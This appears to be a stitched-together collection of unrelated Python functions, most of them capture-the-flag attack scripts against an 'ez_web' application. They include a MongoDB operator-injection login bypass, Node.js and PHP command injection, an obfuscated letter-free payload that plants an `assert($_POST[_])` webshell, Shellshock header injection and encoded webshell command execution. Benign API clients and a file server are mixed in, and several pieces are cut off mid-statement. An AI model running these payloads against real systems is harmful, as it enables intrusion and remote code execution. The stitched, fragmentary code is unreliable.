def run_p2p(target, target_port, cmd):
    """Kick the dropped ``agent.php`` on ``target`` and return a marker command.

    Sends a GET for ``shell_path + 'agent.php'`` (module-level ``shell_path``
    and ``headers``) and discards the response.  The incoming ``cmd`` is not
    used: the value returned (and echoed through ``debug_print``) is a fixed
    ``echo`` marker.
    """
    agent_url = shell_path + 'agent.php'
    # Hitting the URL is the whole point; the body is never inspected.
    http("get", target, target_port, agent_url, '', headers)
    marker = ';echo "visit agent.php "'
    debug_print(marker)
    return marker
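def login(target):
    """Log in to the target's ``ez_web`` admin panel and return its session cookie.

    Fetches ``/ez_web/admin/index.php`` to pick up a ``PHPSESSID`` cookie,
    then sends the MongoDB operator-injection login
    (``uname[$ne]=…&passwd[$ne]=…``) to ``proxy.cgi`` with that cookie.  Uses
    the module-level ``target_port``.

    Returns the ``PHPSESSID=…`` cookie fragment on success, ``False`` when the
    session cookie cannot be located in the first response or the login reply
    does not contain ``"success"``.
    """
    res = http("get", target, target_port, "/ez_web/admin/index.php", "", {})
    start = res.find("PHPSESSID=")
    if start == -1:
        # No session cookie: the original sliced from -1 and produced garbage.
        return False
    # Search for the cookie attribute separator after the cookie itself, not
    # anywhere in the response.
    end = res.find("path", start)
    if end == -1:
        return False
    cookie = res[start:end]
    print(cookie)
    data = "uname[$ne]=666&passwd[$ne]=123456&target=login.cgi"
    res = http("get", target, target_port, "/ez_web/cgi-bin/proxy.cgi?" + data, "", {"Cookie": cookie})
    if "success" in res:
        return cookie
    return False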
def __init__(self, connection):
    """Bind a ``streams`` API client.

    ``connection`` is a mapping with ``base_url``, ``api_key`` and
    ``debug_mode`` keys, forwarded verbatim to the ``http`` client
    constructor.  ``self.stream`` starts out as ``None``.
    """
    self.http = http  # placeholder, replaced by the configured client below
    self.uri = "streams"
    client = http(
        url=connection["base_url"],
        api_key=connection["api_key"],
        debug_mode=connection["debug_mode"],
    )
    self.http = client
    self.stream = None
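def create_http():
    """Build an ``http`` request object from the parsed command-line ``args``.

    Reads the module-level ``args`` (``URL``, ``which``, ``verbose``,
    ``headers``, ``data``, ``file``).  Headers are ``Name:Value`` strings.
    For a ``post`` request the body comes from ``--data`` (JSON-encoded)
    and/or ``--file`` (read verbatim); each sets ``Content-Length`` and a
    default ``application/json`` ``Content-Type``.

    Returns the request object after ``constructContent()``.
    """
    h = http(args.URL)
    h.setType(args.which)
    if args.verbose:
        h.setVerbosity(True)
    for head in args.headers or []:
        # Split on the first ':' only, so values that themselves contain ':'
        # (URLs, host:port) are no longer silently dropped.
        name, sep, value = head.partition(":")
        if sep:
            h.addHeader(name, value)
    if args.which == "post":
        if args.data:
            _attach_json_body(h, json.dumps(args.data), h.setData)
        if args.file:
            with open(args.file, 'r') as f:
                _attach_json_body(h, f.read(), h.setFile)
    h.constructContent()
    return h


def _attach_json_body(h, body, setter):
    """Install ``body`` through ``setter`` and add Content-Type/Length headers."""
    setter(body)
    # Respect an explicit Content-Type from the command line.
    if "Content-Type" not in h.header:
        h.addHeader("Content-Type", "application/json")
    # NOTE(review): len(body) counts characters, not bytes; a non-ASCII body
    # yields a short Content-Length unless ``http`` re-encodes — confirm.
    h.addHeader("Content-Length", str(len(body)))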
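def post_flag(flag):
    """Submit ``flag`` to the flag server.

    Spaces and newlines are stripped from ``flag``; it is then form-encoded
    with the module-level ``flag_token`` and POSTed to
    ``flag_server:flag_port`` at ``flag_url`` using the module-level
    ``headers``.

    Returns the server response on success, ``False`` when the request raised
    (the failure is recorded through ``dump_error``).
    """
    try:
        from urllib import quote  # Python 2
    except ImportError:
        from urllib.parse import quote  # Python 3
    flag = flag.replace(" ", "").replace("\n", "")
    # Percent-encode both values: a flag containing '&', '=' or '+' would
    # otherwise split or corrupt the form body.
    body = "flag=" + quote(flag, safe='') + "&token=" + quote(flag_token, safe='')
    try:
        res = http("post", flag_server, flag_port, flag_url, body, headers)
    except Exception:
        dump_error("flag post error", "flag server", "flag.py post_flag")
        return False
    return res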
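def js_exe(target, filename, cookie):
    """Run ``require('./<filename>').a('sh ./4')`` on the target's Node side.

    The JavaScript is injected through the ``cheat`` parameter of
    ``/ez_web/admin/count.php`` (URL-quoted), using the module-level
    ``target_port`` and the supplied session ``cookie``.

    Returns the HTTP response text, or ``False`` when the request raised (the
    exception is reported via ``dump_error``).  ``filename`` is spliced into a
    single-quoted JS string literal, so it must not contain ``'``.
    """
    header = {"Cookie": cookie}
    data = "require('./" + filename + "').a('sh ./4');1"
    try:
        res = http("get", target, target_port, "/ez_web/admin/count.php?cheat=" + quote(data), "", header)
    except Exception as e:
        dump_error(target, e, "js_exe.py js_exe")
        return False
    # Hand the response back instead of discarding it, so callers can inspect it.
    return res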
def get_upload_token(self, uuid, parent=""):
    """Request an upload token for ``uuid`` beneath ``parent``.

    POSTs the current ``access_token`` together with the ``jue`` section's
    ``access_key``/``access_secret`` (as ``client_id``/``client_secret``) to
    ``<api_resource>cloud/get_upload_token`` and passes the raw response
    through ``self.result``.
    """
    cfg = self.config.get
    payload = {
        "access_token": self.access_token,
        "client_id": cfg("jue", "access_key"),
        "client_secret": cfg("jue", "access_secret"),
        "uuid": uuid,
        "parent": parent,
    }
    endpoint = cfg("jue", "api_resource") + "cloud/get_upload_token"
    response = http().RawRequest(action=endpoint, method="POST", query=payload)
    return self.result(response)
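def post_flag(flag, target):
    """Submit ``flag`` captured from ``target`` to the flag server.

    Strips spaces/newlines from ``flag``, sets the ``Cookie`` entry of the
    module-level ``headers`` dict to ``flag_cookie`` (this mutates the shared
    dict), and POSTs ``melee_flag``, ``token`` (``flag_token``) and
    ``melee_ip`` (``target``) form-encoded to ``flag_server:flag_port`` at
    ``flag_url``.  The response is echoed through ``debug_print``.

    Returns the response on success, ``False`` when the request raised (the
    failure is recorded through ``dump_error``).
    """
    try:
        from urllib import quote  # Python 2
    except ImportError:
        from urllib.parse import quote  # Python 3
    flag = flag.replace(" ", "").replace("\n", "")
    # Percent-encode every value so '&', '=' or '+' in a flag cannot split
    # or corrupt the form body.
    body = "&".join([
        "melee_flag=" + quote(flag, safe=''),
        "token=" + quote(flag_token, safe=''),
        "melee_ip=" + quote(target, safe=''),
    ])
    try:
        headers['Cookie'] = flag_cookie
        res = http("post", flag_server, flag_port, flag_url, body, headers)
        debug_print(res)
    except Exception:
        dump_error("flag post error", "flag server", "flag.py post_flag")
        return False
    return res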
def cloud_add_app_file(self, **file_info):
    """Register a file with the cloud ``callback/add_app_file`` endpoint.

    Every keyword argument is sent as a form field alongside ``access_token``
    (a ``file_info`` key named ``access_token`` would override it).  Returns
    the response text on HTTP 200 and ``None`` for any other status.
    """
    payload = {"access_token": self.access_token}
    payload.update(file_info)
    endpoint = self.config.get("jue", "api_resource") + "callback/add_app_file"
    response = http().RawRequest(action=endpoint, method="POST", query=payload)
    if response["status_code"] != 200:
        return None
    return response["text"]
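def db_admin_attack(target, cmd, cookie):
    """Execute ``cmd`` on the target through the ``db_admin.php`` ``find`` injection.

    ``cmd`` is echoed, URL-quoted and spliced into a PHP ``system('…')`` call
    inside the ``find`` parameter of ``/ez_web/admin/db_admin.php`` (GET with
    the supplied session ``cookie`` on the module-level ``target_port``).

    Returns the response text, or ``"error"`` when the request raised (the
    failure is reported via ``dump_error``).
    """
    header = {"Cookie": cookie}
    res = "error"
    print(cmd)
    # With urllib's quote the single quote is percent-encoded too, so cmd
    # cannot close the PHP string literal early.
    cmd = quote(cmd)
    url = ("/ez_web/admin/db_admin.php?db=admin&action=listRows&collection=zzz"
           "&find=array(1);system('" + cmd + "');exit;")
    try:
        res = http("get", target, target_port, url, "", header)
    except Exception:
        dump_error(target, "something error happens", "db_admin_attack.py db_admin_attack")
    # Return the response instead of silently dropping it.
    return res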
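def client_credentials(self):
    """Obtain an OAuth access token via the client-credentials grant.

    POSTs the ``jue`` section's ``access_key``/``access_secret`` as
    ``client_id``/``client_secret`` to ``<api_oauth>ClientCredentials``.  On
    HTTP 200 the raw body is cached under the ``"auth"`` memory key and
    ``self.access_token`` is set from its ``access_token`` field; both steps
    are best-effort.

    Returns the response text on 200, ``None`` for any other status.
    """
    query = {
        "grant_type": "client_credentials",
        "client_id": self.config.get("jue", "access_key"),
        "client_secret": self.config.get("jue", "access_secret"),
    }
    endpoint = self.config.get("jue", "api_oauth") + "ClientCredentials"
    response = http().RawRequest(action=endpoint, method="POST", query=query)
    if response["status_code"] != 200:
        return None
    body = response["text"]
    try:
        self.memory.set(key="auth", value=body)
        self.access_token = json.loads(body)["access_token"]
    except Exception:
        # Best-effort: a malformed body or cache failure must not hide the
        # response.  Narrowed from a bare ``except`` so KeyboardInterrupt and
        # SystemExit are no longer swallowed.
        pass
    return body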
def attack(target, target_port, cmd, get_flag):
    """Exploit the ``?content=`` PHP injection on ``target`` and run ``cmd``.

    If ``check_shell`` reports an existing webshell, ``cmd`` is executed
    through ``execute_shell``; otherwise a warning is dumped.  A PHP payload
    that builds its function names by incrementing characters (decoding the
    increments gives ``ASSERT`` and ``_POST``, ending in ``assert($_POST[_])``)
    is then sent via GET and the response printed.  On request failure
    ``res`` is set to ``"error"``.

    NOTE(review): ``is_vuln``, ``flag``, ``info`` and ``reserve`` are assigned
    but unused here and ``get_flag`` is never read; the function appears to
    continue beyond this excerpt — confirm against the full file.
    """
    is_vuln = 1
    flag = "hello world!"
    info = "success"
    reserve = 0
    if check_shell(target, target_port, ""):
        res = execute_shell(target, target_port, cmd)
    else:
        dump_warning(target, "check_shell failed", "function.py check_shell")
    try:
        # Letter-free payload: '' -> Array -> "Array" -> 'A', then '++' runs
        # spell out the callable and the superglobal name.
        res = http(
            'get', target, target_port,
            "/?content=$_='';$_[%2b$_]%2b%2b;$_=$_.'';$__=$_[%2b''];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____='_';$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);",
            '', {})
        print res
    except Exception, e:
        dump_error(target, "attack failed", "sample.py attack")
        res = "error"
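def file_write(target, filename, contents, cookie):
    """Write ``contents`` to ``filename`` on the target through the Node ``fs`` injection.

    Each element of ``contents`` is sent in its own request via the ``cheat``
    parameter of ``/ez_web/admin/count.php`` (module-level ``target_port``,
    session ``cookie``): the first chunk uses ``fs.writeFile`` (truncates),
    later chunks ``fs.appendFile``.  Both JS string arguments are emitted as
    JSON string literals, which are valid JS and keep quotes, backslashes and
    newlines in a chunk from breaking the payload (assumes text chunks).

    Returns ``True`` when every chunk was sent, ``False`` on the first request
    that raised (reported via ``dump_error``).
    """
    import json  # JSON string literals double as escaped JS string literals
    header = {"Cookie": cookie}
    print("waiting to writes shell...")
    js_name = json.dumps(filename)
    for index, chunk in enumerate(contents):
        fs_call = "writeFile" if index == 0 else "appendFile"
        data = "require('fs')." + fs_call + "(" + js_name + "," + json.dumps(chunk) + ");1"
        try:
            http("get", target, target_port, "/ez_web/admin/count.php?cheat=" + quote(data), "", header)
        except Exception:
            # NOTE(review): location string looks copy-pasted from
            # db_admin_attack; kept as-is because the real file name is unknown.
            dump_error(target, "something error happens", "db_admin_attack.py db_admin_attack")
            return False
    return True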
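def secret_portal(self, uid, cfrom="cloud.jue.so", token=""):
    """Fetch portal user info for ``uid`` from ``<api_resource>secret/portal``.

    Sends the current ``access_token`` and the ``jue`` credentials together
    with ``uid``, ``from`` (``cfrom``) and ``token``.  When ``token`` is empty
    the hex MD5 of the literal ``"."`` is sent instead — a fixed, guessable
    value kept for compatibility; treat it as a placeholder, not a secret.

    On HTTP 200 the body is parsed as JSON and its ``data`` member cached
    under the ``"userinfo"`` memory key; that member is returned, falling back
    to the raw response text when it is falsy or the body could not be parsed
    (the original raised ``UnboundLocalError`` in that case).  Any other
    status returns ``None``.
    """
    query = {
        "access_token": self.access_token,
        "client_id": self.config.get("jue", "access_key"),
        "client_secret": self.config.get("jue", "access_secret"),
        "uid": uid,
        "from": cfrom,
        "token": token or hashlib.md5(b".").hexdigest(),
    }
    endpoint = self.config.get("jue", "api_resource") + "secret/portal"
    response = http().RawRequest(action=endpoint, method="POST", query=query)
    if response["status_code"] != 200:
        return None
    data = None
    try:
        data = json.loads(response["text"])["data"]
        self.memory.set("userinfo", data)
    except Exception:
        # Best-effort parse/cache; fall through to the raw text below.
        pass
    return data or response["text"]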
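def execute_shell(target, target_port, cmd):
    """Run ``cmd`` through the webshell dropped on ``target``.

    For ``shell_type`` 1 or 2 the shell filename and its ``hash`` argument are
    derived from the module-level ``shell_salt``/``shell_salt_2`` and
    ``target``; ``system`` and ``cmd + ";"`` are sent as fields ``a``/``b``
    after base64 + rot13, with ``+`` percent-encoded so the form body survives.
    The POST goes to ``shell_path/<name>`` with the module-level ``headers``.

    Returns the response text, or ``"error occurs"`` when the request raised
    or ``shell_type`` is unsupported (the latter previously hit an unbound
    ``res`` and raised ``UnboundLocalError``).
    """
    if shell_type not in (1, 2):
        dump_error("unsupported shell_type", target, "function.py execute_shell")
        return "error occurs"
    shell_name = "." + hashlib.md5(shell_salt + target).hexdigest() + ".php"
    shell_arg = hashlib.md5(shell_salt_2 + target).hexdigest()
    fields = []
    for key, raw in (("a", "system"), ("b", cmd + ";")):
        # '+' is the only base64 character that a form parser would mangle.
        encoded = rot13(base64.b64encode(raw)).replace('+', '%2B')
        fields.append(key + "=" + encoded)
    data = "&".join(fields) + "&hash=" + shell_arg
    debug_print("payload => " + data)
    try:
        res = http("post", target, target_port, shell_path + "/" + shell_name, data, headers)
    except Exception as e:
        dump_error(e, target, "function.py execute_shell")
        return "error occurs"
    return res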
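def execute_shell(target, target_port, cmd):
    """Run ``cmd`` through the webshell dropped on ``target``.

    The shell filename and ``hash`` argument come from ``shell_hash``.  For
    ``shell_type`` 1 or 2, ``system`` and ``cmd + ";"`` are sent as fields
    ``a``/``b`` after base64 + rot13, with ``+`` percent-encoded so the form
    body survives.  The POST goes to ``shell_path/<name>`` with the
    module-level ``headers``.

    Returns the response text; ``"timeout"`` when the error text mentions a
    timeout or a refused connection; ``"error occurs"`` for any other request
    failure or an unsupported ``shell_type`` (the latter previously hit an
    unbound ``res`` and raised ``UnboundLocalError``).
    """
    shell_name, shell_arg = shell_hash(target, target_port)
    if shell_type not in (1, 2):
        dump_error("unsupported shell_type", target, "function.py execute_shell")
        return "error occurs"
    fields = []
    for key, raw in (("a", "system"), ("b", cmd + ";")):
        # '+' is the only base64 character that a form parser would mangle.
        encoded = rot13(base64.b64encode(raw)).replace('+', '%2B')
        fields.append(key + "=" + encoded)
    data = "&".join(fields) + "&hash=" + shell_arg
    debug_print("payload => " + data)
    try:
        res = http("post", target, target_port, shell_path + "/" + shell_name, data, headers)
    except Exception as e:
        dump_error(e, target, "function.py execute_shell")
        reason = str(e)
        if 'timed out' in reason or 'Connection refused' in reason:
            return "timeout"
        return "error occurs"
    return res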
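def attack(target, cmd, get_flag):
    """Run ``cmd`` on ``target`` via an existing shell, then probe for Shellshock.

    If ``check_shell`` finds the webshell, ``cmd`` runs through
    ``execute_shell``; otherwise a warning is dumped.  ``cmd`` is then sent in
    a Shellshock ``User-Agent`` (``() { :; }; <cmd>``) to
    ``/ez_web/cgi-bin/skin_api.cgi`` on the module-level ``target_port``; a
    response that does not contain ``"500"`` is reported as "not vulnerable".

    NOTE(review): ``is_vuln``, ``flag``, ``info``, ``reserve`` and
    ``get_flag`` are unused in this excerpt; they look like part of a
    framework result contract and are kept — confirm against the full file.
    """
    is_vuln = 1
    flag = "hello world!"
    info = "success"
    reserve = 0
    # Start from an empty response so the "500" check cannot hit an unbound
    # name when check_shell fails and the request then raises.
    res = ""
    if check_shell(target, ""):
        res = execute_shell(target, cmd)
    else:
        dump_warning(target, "check_shell failed", "function.py check_shell")
    # put your payload code here
    header = {"User-Agent": "() { :; }; " + cmd}
    try:
        res = http("get", target, target_port, "/ez_web/cgi-bin/skin_api.cgi", "", header)
    except Exception as e:
        print(e)
    if "500" not in res:
        dump_error(target, "not vulnerable", "1.py bashshock")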
res = http( 'get', target, target_port, "/?content=$_='';$_[%2b$_]%2b%2b;$_=$_.'';$__=$_[%2b''];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____='_';$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);", '', {}) print res except Exception, e: dump_error(target, "attack failed", "sample.py attack") res = "error" index_1 = res.find("href='") + 6 index_2 = res.find("'>shell") shell_url = "/" + res[index_1:index_2] print "[*]shell_url => " + shell_url try: data = "_=system('" + cmd + "')" res = http("post", target, target_port, shell_url, data, {}) print len(res) except Exception, e: dump_error(target, "attack failed", "sample.py attack") res = "error" if 
get_flag: if check_flag(res): flag = res print "flag => " + res.replace(" ", "").replace("\n", "") else: dump_warning( target, "flag format error,you may need to rewrite the shell", "sample.py attack") elif res == "error": pass else:
def __init__(self, url, nodetype):
    """Create a node scraper for ``url``.

    Wraps ``url`` in an ``http`` handler, records ``nodetype`` and immediately
    runs the private ``__scrapedata`` pass.
    """
    handler = http(url)
    self.handler = handler
    self.nodetype = nodetype
    self.__scrapedata()
def __init__(self, connection):
    """Bind a ``patterns`` API client.

    ``connection`` is a mapping with ``base_url``, ``api_key`` and
    ``debug_mode`` keys, forwarded verbatim to the ``http`` client
    constructor.
    """
    self.http = http  # placeholder, replaced by the configured client below
    self.uri = "patterns"
    client = http(
        url=connection["base_url"],
        api_key=connection["api_key"],
        debug_mode=connection["debug_mode"],
    )
    self.http = client
else: import pwd config.uid = pwd.getpwnam(config.uid)[2] if config.gid.isdigit(): config.gid = int(config.gid) else: import grp config.gid = grp.getgrnam(config.gid)[2] #load all our components import device scanners = device.scanners(config) import control notify = control.control(config, scanners) import http webserver = http.http(config, scanners) #drop our privileges n stuff os.umask(0077) os.setgid(config.gid) os.setuid(config.uid) #let's spawn everything we need t = threading.Thread(target = notify.serve_forever, name = 'Control') t.setDaemon(True) t.start() t = threading.Thread(target = webserver.serve_forever, name = 'Webserver') t.setDaemon(True) t.start() #signal handler
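def handle_client(conn, addr, dir):
    """Serve one HTTP request from ``conn`` against the directory ``dir``.

    Reads the request (``conn.recvall()`` when ``args.arq`` is set, otherwise
    a single 2048-byte ``recv``), parses it with ``parseRequest`` and answers:

    * any path containing ``..`` -> 400 "Access Denied";
    * a path that resolves outside ``dir`` (symlinks, odd separators) -> the
      same 400, as defence in depth beyond the substring check;
    * GET of a path ending in ``/`` -> JSON listing of that directory;
    * GET of an existing file -> its bytes, ``Content-Type`` sniffed by
      ``magic``, ``Content-disposition`` from the request header, ``inline``
      when the query says so, else ``attachment``;
    * POST -> the body plus a newline appended to the file at ``path``
      (parent directories created) under a ``LockFile``;
    * anything else -> 400.

    A body that is not valid UTF-8 gets a 400 instead of an uncaught
    exception.  Exactly one request is answered, then ``conn`` is closed.
    Debug output is gated on the module-level ``args.debugging``.
    """
    if args.debugging:
        print('Handle New client from', addr)
    try:
        if args.arq:
            data = conn.recvall()
        else:
            data = conn.recv(2048)
        if not data:
            return
        try:
            data = data.decode("utf-8")
        except UnicodeDecodeError:
            r = http(400, "".encode("ascii"))
            r.setContent("Bad request!!!".encode("ascii"))
        else:
            r = _handle_request(data, dir)
        if args.debugging:
            print(r.headToString())
        if args.arq:
            conn.sendall(r.headToString().encode("ascii"), False)
        else:
            conn.sendall(r.headToString().encode("ascii"))
        conn.sendall(r.getBody())
    finally:
        conn.close()


def _handle_request(data, dir):
    """Parse one decoded request and build the ``http`` response for it."""
    (method, path, query, body, headers) = parseRequest(data)
    if args.debugging:
        print(method, path, body, headers)
    if ".." in path:
        if args.debugging:
            print("Access Denied", path)
        return _access_denied()
    if not dir.endswith("/"):
        dir = dir + "/"
    path = (dir + path).replace("//", "/")
    if not _is_within(dir, path):
        # The substring check does not cover symlinks or a path that still
        # resolves outside the served tree; refuse those as well.
        if args.debugging:
            print("Access Denied", path)
        return _access_denied()
    if method == "GET":
        return _serve_get(path, query, headers)
    if method == "POST":
        return _serve_post(path, body)
    return http(400, "")


def _access_denied():
    """The 400 response used for every path-traversal refusal."""
    r = http(400, "Access Denied".encode("ascii"))
    r.setContent("You are not allowed to access the files in this folder!".encode("ascii"))
    return r


def _is_within(base, path):
    """True when ``path`` resolves to ``base`` or somewhere beneath it."""
    try:
        base_real = os.path.realpath(base)
        path_real = os.path.realpath(path)
        return os.path.commonpath([base_real, path_real]) == base_real
    except ValueError:
        # Different drives, or an embedded NUL: never inside.
        return False


def _serve_get(path, query, headers):
    """Build the GET response: a directory listing or a file download."""
    try:
        if path.endswith("/"):
            if args.debugging:
                print("GET Directory", path)
            r = http(200, json.dumps(os.listdir(path)).encode("ascii"))
            r.addHeader("Content-Type", "application/json")
            return r
        if not os.path.exists(path):
            r = http(404, "".encode("ascii"))
            r.setContent("File could not be found!".encode("ascii"))
            return r
        if args.debugging:
            print("FIND File", path)
        r = http(200, "")
        kind = magic.from_file(path, mime=True)
        r.addHeader("Content-Type", kind)
        # Always read bytes: the text branch used to re-encode as ASCII and
        # raised on any non-ASCII character, aborting the response.
        with open(path, 'rb') as f:
            r.setContent(f.read())
        if "Content-disposition" in headers:
            # Reflected from the request: drop CR/LF so it cannot inject a
            # header, whatever parseRequest lets through.
            value = headers["Content-disposition"].replace("\r", "").replace("\n", "")
            r.addHeader("Content-disposition", value)
        elif "inline" in query:
            r.addHeader("Content-disposition", "inline")
        else:
            r.addHeader("Content-disposition", "attachment")
        return r
    except OSError as e:
        if args.debugging:
            print(e)
        return http(400, e.strerror)


def _serve_post(path, body):
    """Append ``body`` + newline to the file at ``path`` under a lock."""
    try:
        if args.debugging:
            print("POST File", path)
        pathlib.Path(os.path.dirname(path)).mkdir(parents=True, exist_ok=True)
        lock = LockFile(path)
        lock.acquire()
        try:
            print(os.path.basename(path), " Content", body)
            with open(path, 'a+') as f:
                f.write(body + "\n")
        finally:
            # Release even when the write fails; the lock used to leak.
            lock.release()
        r = http(200, "".encode("ascii"))
        r.setContent("Data successfully added!".encode("ascii"))
        return r
    except OSError as e:
        if args.debugging:
            print(e)
        r = http(400, e.strerror)
        r.setContent("Bad request!!!".encode("ascii"))
        return r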
scan = ap_scan() if options.channel: scan.channel = options.channel scan.initialize() elif options.ssh: util.Msg('Starting SSH server...') tmp = ssh() tmp.initialize() tmp.dump = True elif options.ftp: util.Msg('Starting FTP server...') tmp = ftp() tmp.initialize() tmp.dump = True elif options.http: util.Msg('Starting HTTP server...') tmp = http() tmp.initialize() tmp.dump = True elif options.smb: util.Msg('Starting SMB listener...') tmp = smb() tmp.initialize() tmp.dump = True elif options.wap: util.Msg('Starting wireless access point...') tmp = access_point() tmp.initialize() elif options.update: update() sys.exit(1)